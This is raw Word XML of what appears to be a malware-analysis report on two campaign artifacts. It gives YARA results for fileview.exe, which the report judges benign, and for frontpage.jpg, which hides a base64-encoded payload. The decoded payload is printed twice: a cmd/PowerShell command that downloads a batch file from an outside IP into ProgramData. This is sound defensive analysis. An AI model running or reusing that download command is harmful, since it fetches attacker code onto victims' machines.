    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000107">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_uvhjsvx24al9" w:id="21"/>
      <w:bookmarkEnd w:id="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8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fsaeek9lcu7o" w:id="22"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Analysis Summary </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000109">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ws68d5dzn14h" w:id="23"/>
      <w:bookmarkEnd w:id="23"/>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Artifact #1: fileview.exe </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="073763"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="073763"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">YARA File Artifacts:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010B">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Suspicious_API_Calls:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010C">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0x1d64c:$api1: CreateRemoteThread</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010D">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0x1b158:$api4: OpenProcess</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010E">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0x1d54e:$api4: OpenProcess</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010F">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0x1dec6:$api4: OpenProcess</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000110">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0x1d24a:$api5: GetProcAddress</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000111">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0x1d23a:$api6: LoadLibrary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000112">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0x1d470:$api6: LoadLibrary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000113">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Persistence techniques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4">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0x1d665:$startup: Startup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000115">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UnusualNumOfExports:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000116">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YaraFile Empty</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000117">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SuspiciousSYSSectionCount:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000118">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0x22832:$sys_id2: ntoskrnl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000119">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0x297b8:$sys_id2: ntoskrnl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011A">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SuspiciousDLLSectionCount:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011B">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0x1cff8:$dll_id1: .dll</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011C">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0x1d160:$dll_id1: .dll</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011D">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0x1d1af:$dll_id1: .dll</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011E">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0x1d67a:$dll_id1: .dll</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011F">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0x1de5d:$dll_id1: .dll</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000120">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0x1de8a:$dll_id1: .dll</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000121">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0x1df14:$dll_id1: .dll</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000122">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0x1dfb1:$dll_id1: .dll</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000123">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DetectHTTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000124">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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Multiple instances of .com, .net, HTTP, and HTTPS are all present. There is only a single IPv4 address, and that would be 6.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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05188" cy="3405188"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="4"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3405188" cy="340518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searching VirusTotal for the hash values of the Thug Lyfe Campaign files, only fileview.exe was found in the system. It was marked as not malicious by all available security vendors on the site. </w:t>
      </w:r>
    </w:p>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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table9"/>
        <w:tblW w:w="921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0"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="921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ind w:right="-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revealed several indicators that initially appeared suspicious but were ultimately benign upon closer inspection. API calls such as `</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i w:val="1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CreateRemoteThread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OpenProcess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GetProcAddress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LoadLibrary</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">` were flagged during testing. While these functions </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CAN </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">be leveraged for malicious purposes like process injection, they are also commonly used by legitimate Windows applications and system processes. Additionally, Virus Total states that this file is not flagged as malicious by any security vendors. After reviewing all available evidence and consulting with the team, we concluded that</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> fileview.exe is a benign file </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">and does not pose a threat.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_co9cgtie29cy" w:id="24"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_q3jbz3nmku6" w:id="25"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">🚨 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Artifact #2: frontpage.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:color w:val="073763"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">YARA File Artifacts:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012D">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JPG_ImageTypeTest:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>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0x0:$jpg_magic: FF D8 FF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012F">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JPEG_ImageChecker:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000130">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>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0x0:$jpeg_header: FF D8 FF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000131">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Base64-Check.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000132">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>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See the code block below</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000133">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000134">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>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Match</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#1</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35">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Position:</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80</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(0x50)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000136">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Length:</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148</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characters</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000137">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000138">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Base64</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content:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000139">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Y21kIC9jIHBvd2Vyc2hlbGwgaW52b2tlLXdlYnJlcXVlc3QgLXVyaSAnaHR0cDovLzEwOC4xODEuMTU1LjMxL2FzZWZhLmJhdCcgLW91dGZpbGUgJ2M6XHByb2dyYW1kYXRhXGFzZWZhLmJhdCcK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013B">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Successfully</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decoded</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to</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111</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bytes:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013C">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---DECODED</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START---</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="black"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd</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/c</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powershell</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invoke-webrequest</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-uri</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'http://108.181.155.31/asefa.bat'</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-outfile</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'c:\programdata\asefa.bat'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013F">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---DECODED</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END---</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000140">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000141">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42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000143">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Match</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#2</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44">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Position:</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303</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(0x12F)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000145">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Length:</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148</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characters</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000146">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000147">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Base64</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content:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000148">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Y21kIC9jIHBvd2Vyc2hlbGwgaW52b2tlLXdlYnJlcXVlc3QgLXVyaSAnaHR0cDovLzEwOC4xODEuMTU1LjMxL2FzZWZhLmJhdCcgLW91dGZpbGUgJ2M6XHByb2dyYW1kYXRhXGFzZWZhLmJhdCcK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000149">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014A">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Successfully</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decoded</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to</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111</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bytes:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014B">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---DECODED</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START---</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="black"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd</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/c</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powershell</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invoke-webrequest</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-uri</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'http://108.181.155.31/asefa.bat'</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-outfile</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'c:\programdata\asefa.bat'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
